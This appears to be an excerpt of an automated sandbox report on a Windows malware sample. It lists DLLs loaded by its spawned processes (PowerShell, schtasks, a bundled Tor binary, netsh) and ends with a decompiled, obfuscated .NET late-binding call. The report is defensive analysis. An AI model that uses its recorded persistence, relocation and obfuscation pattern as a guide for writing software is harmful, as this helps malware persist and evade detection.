Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libevent-2-1-7.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libssp-0.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libssp-0.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libgcc_s_sjlj-1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libwinpthread-1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libwinpthread-1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: zlib1.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains method to dynamically call methods (often used by packers)

Source: yt7dW9nyJK.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: yt7dW9nyJK.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
